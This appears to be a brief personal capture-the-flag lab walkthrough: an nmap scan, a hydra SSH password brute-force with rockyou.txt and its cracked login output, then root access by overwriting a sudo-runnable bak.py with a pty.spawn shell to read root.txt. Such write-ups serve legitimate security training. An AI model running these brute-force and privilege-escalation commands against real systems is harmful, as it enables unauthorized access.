export ip=10.10.21.212

nmao scan {nmap -sC -sV -oN nmap/initial $ip}

SSH,HTTP 


check the website {Author of the blog : meliodas}

use hydra to brute force on ssh {hydra -l meliodas -P /root/Desktop/rockyou.txt ssh://$ip} 


[22][ssh] host: 10.10.21.212   login: meliodas   password: iloveyou1



connect ssh as meliodas

get user flag 

sudo -l {if we execute bak.py so we can get root shell without passwd so let's change the bak.py file with malisious code}

remove the previous bak.py file 


echo 'import pty; pty.spawn("/bin/sh")' > /home/meliodas/bak.py



exexute : sudo python /home/meliodas/bak.py

whoami

cd /root/

pwd

cat root.txt




